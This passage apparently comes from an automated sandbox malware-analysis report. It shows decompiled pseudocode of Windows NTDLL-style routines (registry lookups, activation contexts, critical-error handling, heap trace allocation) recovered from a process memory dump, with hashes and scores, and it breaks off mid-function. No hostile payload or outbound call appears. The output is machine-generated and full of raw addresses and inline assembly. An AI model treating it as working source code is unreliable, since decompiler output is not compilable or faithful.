                    				_t42 =  *(_t59 + 0xc) & 0x40000000;
                    				asm("sbb esi, esi");
                    				_t88 = ( ~_t42 & 0x0000003c) + 4;
                    				if(_t42 != 0) {
                    					_push(0);
                    					_push(0x14);
                    					_push( &_v24);
                    					_push(3);
                    					_push(_t59);
                    					_push(0xffffffff);
                    					if(E016A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                    						_push(_t61);
                    						E0172A80D(_t59, 1, _v20, 0);
                    						_t88 = 4;
                    					}
                    				}
                    				_t35 = E0172A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                    				if(_t35 < 0) {
                    					goto L14;
                    				}
                    				E01731293(_t79, _v40, E017307DF(_t79, _v28,  &_a4,  &_a8, 1));
                    				if(E01687D50() == 0) {
                    					_t48 = 0x7ffe0380;
                    				} else {
                    					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    				}
                    				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                    					E0172138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                    				}
                    				goto L13;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction ID: 88ea78ee2e2ca5e8ecde6cd1d4dba92b4505aabeb00c5b0234cd323df3c53b54
                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction Fuzzy Hash: AF311332304316ABE720DE29CC84F9BBBD9EBC4754F144229FA58DB685D770E914CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E016E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                    				char _v8;
                    				intOrPtr _v12;
                    				intOrPtr* _v16;
                    				char* _v20;
                    				short _v22;
                    				char _v24;
                    				intOrPtr _t38;
                    				short _t40;
                    				short _t41;
                    				void* _t44;
                    				intOrPtr _t47;
                    				void* _t48;
                    
                    				_v16 = __edx;
                    				_t40 = 0x14;
                    				_v24 = _t40;
                    				_t41 = 0x16;
                    				_v22 = _t41;
                    				_t38 = 0;
                    				_v12 = __ecx;
                    				_push( &_v8);
                    				_push(0);
                    				_push(0);
                    				_push(2);
                    				_t43 =  &_v24;
                    				_v20 = L"BinaryName";
                    				_push( &_v24);
                    				_push(__ecx);
                    				_t47 = 0;
                    				_t48 = E016A9650();
                    				if(_t48 >= 0) {
                    					_t48 = 0xc000090b;
                    				}
                    				if(_t48 != 0xc0000023) {
                    					_t44 = 0;
                    					L13:
                    					if(_t48 < 0) {
                    						L16:
                    						if(_t47 != 0) {
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                    						}
                    						L18:
                    						return _t48;
                    					}
                    					 *_v16 = _t38;
                    					 *_a4 = _t47;
                    					goto L18;
                    				}
                    				_t47 = L01684620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                    				if(_t47 != 0) {
                    					_push( &_v8);
                    					_push(_v8);
                    					_push(_t47);
                    					_push(2);
                    					_push( &_v24);
                    					_push(_v12);
                    					_t48 = E016A9650();
                    					if(_t48 < 0) {
                    						_t44 = 0;
                    						goto L16;
                    					}
                    					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                    						_t48 = 0xc000090b;
                    					}
                    					_t44 = 0;
                    					if(_t48 < 0) {
                    						goto L16;
                    					} else {
                    						_t17 = _t47 + 0xc; // 0xc
                    						_t38 = _t17;
                    						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                    							_t48 = 0xc000090b;
                    						}
                    						goto L13;
                    					}
                    				}
                    				_t48 = _t48 + 0xfffffff4;
                    				goto L18;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: BinaryName
                    • API String ID: 0-215506332
                    • Opcode ID: fe34f904f235bb87cc0000e4b412c3c11d5178bf50ab7ac328099bcd99feb44f
                    • Instruction ID: 2e653852b0ba3b9ad9e612479c224b123dd1cc0e5a4c2bef0596bdef30abcb25
                    • Opcode Fuzzy Hash: fe34f904f235bb87cc0000e4b412c3c11d5178bf50ab7ac328099bcd99feb44f
                    • Instruction Fuzzy Hash: 0431D47290251ABFEB15DA58CD49E6BBBB5FF80720F124269E914A7351E7309E01C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 33%
                    			E0169D294(void* __ecx, char __edx, void* __eflags) {
                    				signed int _v8;
                    				char _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				intOrPtr _v64;
                    				char* _v68;
                    				intOrPtr _v72;
                    				char _v76;
                    				signed int _v84;
                    				intOrPtr _v88;
                    				char _v92;
                    				intOrPtr _v96;
                    				intOrPtr _v100;
                    				char _v104;
                    				char _v105;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t35;
                    				char _t38;
                    				signed int _t40;
                    				signed int _t44;
                    				signed int _t52;
                    				void* _t53;
                    				void* _t55;
                    				void* _t61;
                    				intOrPtr _t62;
                    				void* _t64;
                    				signed int _t65;
                    				signed int _t66;
                    
                    				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                    				_v8 =  *0x175d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                    				_v105 = __edx;
                    				_push( &_v92);
                    				_t52 = 0;
                    				_push(0);
                    				_push(0);
                    				_push( &_v104);
                    				_push(0);
                    				_t59 = __ecx;
                    				_t55 = 2;
                    				if(E01684120(_t55, __ecx) < 0) {
                    					_t35 = 0;
                    					L8:
                    					_pop(_t61);
                    					_pop(_t64);
                    					_pop(_t53);
                    					return E016AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                    				}
                    				_v96 = _v100;
                    				_t38 = _v92;
                    				if(_t38 != 0) {
                    					_v104 = _t38;
                    					_v100 = _v88;
                    					_t40 = _v84;
                    				} else {
                    					_t40 = 0;
                    				}
                    				_v72 = _t40;
                    				_v68 =  &_v104;
                    				_push( &_v52);
                    				_v76 = 0x18;
                    				_push( &_v76);
                    				_v64 = 0x40;
                    				_v60 = _t52;
                    				_v56 = _t52;
                    				_t44 = E016A98D0();
                    				_t62 = _v88;
                    				_t65 = _t44;
                    				if(_t62 != 0) {
                    					asm("lock xadd [edi], eax");
                    					if((_t44 | 0xffffffff) != 0) {
                    						goto L4;
                    					}
                    					_push( *((intOrPtr*)(_t62 + 4)));
                    					E016A95D0();
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                    					goto L4;
                    				} else {
                    					L4:
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                    					if(_t65 >= 0) {
                    						_t52 = 1;
                    					} else {
                    						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                    							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                    						}
                    					}
                    					_t35 = _t52;
                    					goto L8;
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: e2691eb16ca8c941316491b53ee1de05da8f9fbc33d3c63b06b8b7c4146a05d2
                    • Instruction ID: fb0dd9876a04b56c19da01cd5cb6a8116dcbefa62a9956d98685807e2750a610
                    • Opcode Fuzzy Hash: e2691eb16ca8c941316491b53ee1de05da8f9fbc33d3c63b06b8b7c4146a05d2
                    • Instruction Fuzzy Hash: BA318DB1508305AFCB21DF68CD80A6BBBEDEB9A654F400A2EF994C3250D735DD05CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E01671B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                    				intOrPtr _v8;
                    				char _v16;
                    				intOrPtr* _t26;
                    				intOrPtr _t29;
                    				void* _t30;
                    				signed int _t31;
                    
                    				_t27 = __ecx;
                    				_t29 = __edx;
                    				_t31 = 0;
                    				_v8 = __edx;
                    				if(__edx == 0) {
                    					L18:
                    					_t30 = 0xc000000d;
                    					goto L12;
                    				} else {
                    					_t26 = _a4;
                    					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                    						goto L18;
                    					} else {
                    						E016ABB40(__ecx,  &_v16, __ecx);
                    						_push(_t26);
                    						_push(0);
                    						_push(0);
                    						_push(_t29);
                    						_push( &_v16);
                    						_t30 = E016AA9B0();
                    						if(_t30 >= 0) {
                    							_t19 =  *_t26;
                    							if( *_t26 != 0) {
                    								goto L7;
                    							} else {
                    								 *_a8 =  *_a8 & 0;
                    							}
                    						} else {
                    							if(_t30 != 0xc0000023) {
                    								L9:
                    								_push(_t26);
                    								_push( *_t26);
                    								_push(_t31);
                    								_push(_v8);
                    								_push( &_v16);
                    								_t30 = E016AA9B0();
                    								if(_t30 < 0) {
                    									L12:
                    									if(_t31 != 0) {
                    										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                    									}
                    								} else {
                    									 *_a8 = _t31;
                    								}
                    							} else {
                    								_t19 =  *_t26;
                    								if( *_t26 == 0) {
                    									_t31 = 0;
                    								} else {
                    									L7:
                    									_t31 = L01684620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                    								}
                    								if(_t31 == 0) {
                    									_t30 = 0xc0000017;
                    								} else {
                    									goto L9;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _t30;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: WindowsExcludedProcs
                    • API String ID: 0-3583428290
                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction ID: 54c11fda5ab83671fe436e29d5075fbe45b90d8cc083ae5397454b8f9e88c7d8
                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction Fuzzy Hash: BA21DA7B601129ABDB22DA99CC40F6B7BADEF42A54F05446AFE049B300D734DD01DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0168F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                    				intOrPtr _t13;
                    				intOrPtr _t14;
                    				signed int _t16;
                    				signed char _t17;
                    				intOrPtr _t19;
                    				intOrPtr _t21;
                    				intOrPtr _t23;
                    				intOrPtr* _t25;
                    
                    				_t25 = _a8;
                    				_t17 = __ecx;
                    				if(_t25 == 0) {
                    					_t19 = 0xc00000f2;
                    					L8:
                    					return _t19;
                    				}
                    				if((__ecx & 0xfffffffe) != 0) {
                    					_t19 = 0xc00000ef;
                    					goto L8;
                    				}
                    				_t19 = 0;
                    				 *_t25 = 0;
                    				_t21 = 0;
                    				_t23 = "Actx ";
                    				if(__edx != 0) {
                    					if(__edx == 0xfffffffc) {
                    						L21:
                    						_t21 = 0x200;
                    						L5:
                    						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                    						 *_t25 = _t13;
                    						L6:
                    						if(_t13 == 0) {
                    							if((_t17 & 0x00000001) != 0) {
                    								 *_t25 = _t23;
                    							}
                    						}
                    						L7:
                    						goto L8;
                    					}
                    					if(__edx == 0xfffffffd) {
                    						 *_t25 = _t23;
                    						_t13 = _t23;
                    						goto L6;
                    					}
                    					_t13 =  *((intOrPtr*)(__edx + 0x10));
                    					 *_t25 = _t13;
                    					L14:
                    					if(_t21 == 0) {
                    						goto L6;
                    					}
                    					goto L5;
                    				}
                    				_t14 = _a4;
                    				if(_t14 != 0) {
                    					_t16 =  *(_t14 + 0x14) & 0x00000007;
                    					if(_t16 <= 1) {
                    						_t21 = 0x1f8;
                    						_t13 = 0;
                    						goto L14;
                    					}
                    					if(_t16 == 2) {
                    						goto L21;
                    					}
                    					if(_t16 != 4) {
                    						_t19 = 0xc00000f0;
                    						goto L7;
                    					}
                    					_t13 = 0;
                    					goto L6;
                    				} else {
                    					_t21 = 0x1f8;
                    					goto L5;
                    				}
                    			}












                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Actx
                    • API String ID: 0-89312691
                    • Opcode ID: 55c4acfa3369f6a5bd734a0aff805f45ca032230b7172ac6fd4b1d825c529d88
                    • Instruction ID: 0d58c19aa6f326d0c8c418ee2f81c58a3bc42f1639188f2dd00a7303d4aafd04
                    • Opcode Fuzzy Hash: 55c4acfa3369f6a5bd734a0aff805f45ca032230b7172ac6fd4b1d825c529d88
                    • Instruction Fuzzy Hash: 711104347087028BFB247E1CAC9073676D5EB86624F2547BAE562DB391DB74CC028340
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E01718DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t35;
                    				void* _t41;
                    
                    				_t40 = __esi;
                    				_t39 = __edi;
                    				_t38 = __edx;
                    				_t35 = __ecx;
                    				_t34 = __ebx;
                    				_push(0x74);
                    				_push(0x1740d50);
                    				E016BD0E8(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                    				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                    				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                    					E016F5720(0x65, 0, "Critical error detected %lx\n", _t35);
                    					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                    						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                    						asm("int3");
                    						 *(_t41 - 4) = 0xfffffffe;
                    					}
                    				}
                    				 *(_t41 - 4) = 1;
                    				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                    				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                    				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                    				 *((intOrPtr*)(_t41 - 0x64)) = L016BDEF0;
                    				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                    				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                    				_push(_t41 - 0x70);
                    				L016BDEF0(1, _t38);
                    				 *(_t41 - 4) = 0xfffffffe;
                    				return E016BD130(_t34, _t39, _t40);
                    			}






                    Strings
                    • Critical error detected %lx, xrefs: 01718E21
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Critical error detected %lx
                    • API String ID: 0-802127002
                    • Opcode ID: 5f493f75ff37859889e97364d86e2feb8ba5005412bb8692219abe685b3b8213
                    • Instruction ID: cc4d6fe61b486651fa1068be22bb4edcf3ddb1bf1f4be6c9e7b1fac4e8fe0d81
                    • Opcode Fuzzy Hash: 5f493f75ff37859889e97364d86e2feb8ba5005412bb8692219abe685b3b8213
                    • Instruction Fuzzy Hash: 28117971D14348DBDB24CFA889057DDFBB1AB08314F24426DE529AB282C3300606CF15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 016FFF60
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                    • API String ID: 0-1911121157
                    • Opcode ID: 7db19dff68c6e0a16156f85eab7225aabbe5224e3e537146d9799e2007bbd11c
                    • Instruction ID: 3f981640268cdeafe4218a39e9b36750451b4a543e5b39aa759267337cde5542
                    • Opcode Fuzzy Hash: 7db19dff68c6e0a16156f85eab7225aabbe5224e3e537146d9799e2007bbd11c
                    • Instruction Fuzzy Hash: F111A172911244EFDB26DB58CD88FA8BBB2BB04719F14849CE6096B261C7799980CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E01735BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t296;
                    				signed char _t298;
                    				signed int _t301;
                    				signed int _t306;
                    				signed int _t310;
                    				signed char _t311;
                    				intOrPtr _t312;
                    				signed int _t313;
                    				void* _t327;
                    				signed int _t328;
                    				intOrPtr _t329;
                    				intOrPtr _t333;
                    				signed char _t334;
                    				signed int _t336;
                    				void* _t339;
                    				signed int _t340;
                    				signed int _t356;
                    				signed int _t362;
                    				short _t367;
                    				short _t368;
                    				short _t373;
                    				signed int _t380;
                    				void* _t382;
                    				short _t385;
                    				signed short _t392;
                    				signed char _t393;
                    				signed int _t395;
                    				signed char _t397;
                    				signed int _t398;
                    				signed short _t402;
                    				void* _t406;
                    				signed int _t412;
                    				signed char _t414;
                    				signed short _t416;
                    				signed int _t421;
                    				signed char _t427;
                    				intOrPtr _t434;
                    				signed char _t435;
                    				signed int _t436;
                    				signed int _t442;
                    				signed int _t446;
                    				signed int _t447;
                    				signed int _t451;
                    				signed int _t453;
                    				signed int _t454;
                    				signed int _t455;
                    				intOrPtr _t456;
                    				intOrPtr* _t457;
                    				short _t458;
                    				signed short _t462;
                    				signed int _t469;
                    				intOrPtr* _t474;
                    				signed int _t475;
                    				signed int _t479;
                    				signed int _t480;
                    				signed int _t481;
                    				short _t485;
                    				signed int _t491;
                    				signed int* _t494;
                    				signed int _t498;
                    				signed int _t505;
                    				intOrPtr _t506;
                    				signed short _t508;
                    				signed int _t511;
                    				void* _t517;
                    				signed int _t519;
                    				signed int _t522;
                    				void* _t523;
                    				signed int _t524;
                    				void* _t528;
                    				signed int _t529;
                    
                    				_push(0xd4);
                    				_push(0x1741178);
                    				E016BD0E8(__ebx, __edi, __esi);
                    				_t494 = __edx;
                    				 *(_t528 - 0xcc) = __edx;
                    				_t511 = __ecx;
                    				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                    				 *(_t528 - 0xbc) = __ecx;
                    				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                    				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                    				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                    				_t427 = 0;
                    				 *(_t528 - 0x74) = 0;
                    				 *(_t528 - 0x9c) = 0;
                    				 *(_t528 - 0x84) = 0;
                    				 *(_t528 - 0xac) = 0;
                    				 *(_t528 - 0x88) = 0;
                    				 *(_t528 - 0xa8) = 0;
                    				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                    				if( *(_t528 + 0x1c) <= 0x80) {
                    					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                    					if(__eflags != 0) {
                    						_t421 = E01734C56(0, __edx, __ecx, __eflags);
                    						__eflags = _t421;
                    						if(_t421 != 0) {
                    							 *((intOrPtr*)(_t528 - 4)) = 0;
                    							E016AD000(0x410);
                    							 *(_t528 - 0x18) = _t529;
                    							 *(_t528 - 0x9c) = _t529;
                    							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                    							E01735542(_t528 - 0x9c, _t528 - 0x84);
                    						}
                    					}
                    					_t435 = _t427;
                    					 *(_t528 - 0xd0) = _t435;
                    					_t474 = _t511 + 0x65;
                    					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                    					_t511 = 0x18;
                    					while(1) {
                    						 *(_t528 - 0xa0) = _t427;
                    						 *(_t528 - 0xbc) = _t427;
                    						 *(_t528 - 0x80) = _t427;
                    						 *(_t528 - 0x78) = 0x50;
                    						 *(_t528 - 0x79) = _t427;
                    						 *(_t528 - 0x7a) = _t427;
                    						 *(_t528 - 0x8c) = _t427;
                    						 *(_t528 - 0x98) = _t427;
                    						 *(_t528 - 0x90) = _t427;
                    						 *(_t528 - 0xb0) = _t427;
                    						 *(_t528 - 0xb8) = _t427;
                    						_t296 = 1 << _t435;
                    						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                    						__eflags = _t436 & _t296;
                    						if((_t436 & _t296) != 0) {
                    							goto L92;
                    						}
                    						__eflags =  *((char*)(_t474 - 1));
                    						if( *((char*)(_t474 - 1)) == 0) {
                    							goto L92;
                    						}
                    						_t301 =  *_t474;
                    						__eflags = _t494[1] - _t301;
                    						if(_t494[1] <= _t301) {
                    							L10:
                    							__eflags =  *(_t474 - 5) & 0x00000040;
                    							if(( *(_t474 - 5) & 0x00000040) == 0) {
                    								L12:
                    								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                    								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                    									goto L92;
                    								}
                    								_t442 =  *(_t474 - 0x11) & _t494[3];
                    								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                    								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                    									goto L92;
                    								}
                    								__eflags = _t442 -  *(_t474 - 0x11);
                    								if(_t442 !=  *(_t474 - 0x11)) {
                    									goto L92;
                    								}
                    								L15:
                    								_t306 =  *(_t474 + 1) & 0x000000ff;
                    								 *(_t528 - 0xc0) = _t306;
                    								 *(_t528 - 0xa4) = _t306;
                    								__eflags =  *0x17560e8;
                    								if( *0x17560e8 != 0) {
                    									__eflags = _t306 - 0x40;
                    									if(_t306 < 0x40) {
                    										L20:
                    										asm("lock inc dword [eax]");
                    										_t310 =  *0x17560e8; // 0x0
                    										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                    										__eflags = _t311 & 0x00000001;
                    										if((_t311 & 0x00000001) == 0) {
                    											 *(_t528 - 0xa0) = _t311;
                    											_t475 = _t427;
                    											 *(_t528 - 0x74) = _t427;
                    											__eflags = _t475;
                    											if(_t475 != 0) {
                    												L91:
                    												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                    												goto L92;
                    											}
                    											asm("sbb edi, edi");
                    											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                    											_t511 = _t498;
                    											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                    											__eflags =  *(_t312 - 5) & 1;
                    											if(( *(_t312 - 5) & 1) != 0) {
                    												_push(_t528 - 0x98);
                    												_push(0x4c);
                    												_push(_t528 - 0x70);
                    												_push(1);
                    												_push(0xfffffffa);
                    												_t412 = E016A9710();
                    												_t475 = _t427;
                    												__eflags = _t412;
                    												if(_t412 >= 0) {
                    													_t414 =  *(_t528 - 0x98) - 8;
                    													 *(_t528 - 0x98) = _t414;
                    													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                    													 *(_t528 - 0x8c) = _t416;
                    													 *(_t528 - 0x79) = 1;
                    													_t511 = (_t416 & 0x0000ffff) + _t498;
                    													__eflags = _t511;
                    												}
                    											}
                    											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                    											__eflags = _t446 & 0x00000004;
                    											if((_t446 & 0x00000004) != 0) {
                    												__eflags =  *(_t528 - 0x9c);
                    												if( *(_t528 - 0x9c) != 0) {
                    													 *(_t528 - 0x7a) = 1;
                    													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                    													__eflags = _t511;
                    												}
                    											}
                    											_t313 = 2;
                    											_t447 = _t446 & _t313;
                    											__eflags = _t447;
                    											 *(_t528 - 0xd4) = _t447;
                    											if(_t447 != 0) {
                    												_t406 = 0x10;
                    												_t511 = _t511 + _t406;
                    												__eflags = _t511;
                    											}
                    											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                    											 *(_t528 - 0x88) = _t427;
                    											__eflags =  *(_t528 + 0x1c);
                    											if( *(_t528 + 0x1c) <= 0) {
                    												L45:
                    												__eflags =  *(_t528 - 0xb0);
                    												if( *(_t528 - 0xb0) != 0) {
                    													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                    													__eflags = _t511;
                    												}
                    												__eflags = _t475;
                    												if(_t475 != 0) {
                    													asm("lock dec dword [ecx+edx*8+0x4]");
                    													goto L100;
                    												} else {
                    													_t494[3] = _t511;
                    													_t451 =  *(_t528 - 0xa0);
                    													_t427 = E016A6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                    													 *(_t528 - 0x88) = _t427;
                    													__eflags = _t427;
                    													if(_t427 == 0) {
                    														__eflags = _t511 - 0xfff8;
                    														if(_t511 <= 0xfff8) {
                    															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                    															asm("sbb ecx, ecx");
                    															__eflags = (_t451 & 0x000000e2) + 8;
                    														}
                    														asm("lock dec dword [eax+edx*8+0x4]");
                    														L100:
                    														goto L101;
                    													}
                    													_t453 =  *(_t528 - 0xa0);
                    													 *_t494 = _t453;
                    													_t494[1] = _t427;
                    													_t494[2] =  *(_t528 - 0xbc);
                    													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                    													 *_t427 =  *(_t453 + 0x24) | _t511;
                    													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                    													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													__eflags =  *(_t528 + 0x14);
                    													if( *(_t528 + 0x14) == 0) {
                    														__eflags =  *[fs:0x18] + 0xf50;
                    													}
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													__eflags =  *(_t528 + 0x18);
                    													if( *(_t528 + 0x18) == 0) {
                    														_t454 =  *(_t528 - 0x80);
                    														_t479 =  *(_t528 - 0x78);
                    														_t327 = 1;
                    														__eflags = 1;
                    													} else {
                    														_t146 = _t427 + 0x50; // 0x50
                    														_t454 = _t146;
                    														 *(_t528 - 0x80) = _t454;
                    														_t382 = 0x18;
                    														 *_t454 = _t382;
                    														 *((short*)(_t454 + 2)) = 1;
                    														_t385 = 0x10;
                    														 *((short*)(_t454 + 6)) = _t385;
                    														 *(_t454 + 4) = 0;
                    														asm("movsd");
                    														asm("movsd");
                    														asm("movsd");
                    														asm("movsd");
                    														_t327 = 1;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 = 0x68;
                    														 *(_t528 - 0x78) = _t479;
                    													}
                    													__eflags =  *(_t528 - 0x79) - _t327;
                    													if( *(_t528 - 0x79) == _t327) {
                    														_t524 = _t479 + _t427;
                    														_t508 =  *(_t528 - 0x8c);
                    														 *_t524 = _t508;
                    														_t373 = 2;
                    														 *((short*)(_t524 + 2)) = _t373;
                    														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                    														 *((short*)(_t524 + 4)) = 0;
                    														_t167 = _t524 + 8; // 0x8
                    														E016AF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                    														_t529 = _t529 + 0xc;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                    														 *(_t528 - 0x78) = _t479;
                    														_t380 =  *(_t528 - 0x80);
                    														__eflags = _t380;
                    														if(_t380 != 0) {
                    															_t173 = _t380 + 4;
                    															 *_t173 =  *(_t380 + 4) | 1;
                    															__eflags =  *_t173;
                    														}
                    														_t454 = _t524;
                    														 *(_t528 - 0x80) = _t454;
                    														_t327 = 1;
                    														__eflags = 1;
                    													}
                    													__eflags =  *(_t528 - 0xd4);
                    													if( *(_t528 - 0xd4) == 0) {
                    														_t505 =  *(_t528 - 0x80);
                    													} else {
                    														_t505 = _t479 + _t427;
